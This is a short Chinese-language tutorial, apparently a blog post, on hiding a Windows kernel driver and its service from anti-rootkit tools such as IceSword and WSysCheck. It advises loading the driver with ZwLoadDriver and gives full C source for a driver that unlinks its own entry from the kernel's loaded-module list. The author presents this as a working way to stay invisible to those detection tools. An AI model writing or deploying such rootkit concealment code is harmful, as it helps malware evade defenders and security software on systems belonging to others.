1隐藏服务驱动的加载一般有三种方式:OpenSCManagerZwLoadDriverZwSetSystemInformation这里我们用ZwLoadDriver来加载驱动程序.便可以隐藏服务了,没试其他,冰刃和WSysCheck就看不到我们的服务了2隐藏模块摘链,注意加载驱动用ZwLoadDriver不要用OpenSCManager,否则如下图一样:驱动代码比较简单01 #include "ntddk.h" 02 typedef unsigned long DWORD; 03 typedef DWORD* PDWORD; 04 typedef struct _DRIVER_DATA 05 { 06 LIST_ENTRY listEntry; 07 DWORD unknown1; 08 DWORD unknown2; 09 DWORD unknown3; 10 DWORD unknown4; 11 DWORD unknown5; 12 DWORD unknown6; 13 DWORD unknown7; 14 UNICODE_STRING path; 15 UNICODE_STRING name; 16 } DRIVER_DATA; 17 VOID OnUnload( IN PDRIVER_OBJECT pDriverObject ) 18 { 19 DbgPrint("OnUnload called."); 20 } 21 NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING theRegistryPath ) 22 { 23 24 DRIVER_DATA* driverData; 25 driverData = *((DRIVER_DATA**)((DWORD)pDriverObject + 20)); 26 if( driverData != NULL ) 27 { 28 *((PDWORD)driverData->listEntry.Blink) = (DWORD)driverData->listEntry.Flink; 29 driverData->listEntry.Flink->Blink = driverData->listEntry.Blink; 30 DbgPrint("Sucessfull.\n"); 31 } 32 pDriverObject->DriverUnload = OnUnload; 33 return STATUS_SUCCESS; 34 } 加载驱动后,我们用DbgView看到打出的Sucessfull就知道我们的驱动已经运行了...然后用冰刃的查看模块,服务..好像没什么动静...he8he8下面的图是用OpenSCManager加载驱动的效果....所以不要用OpenSCManager加载,用ZwLoadDriver加载,这样冰刃才查不出来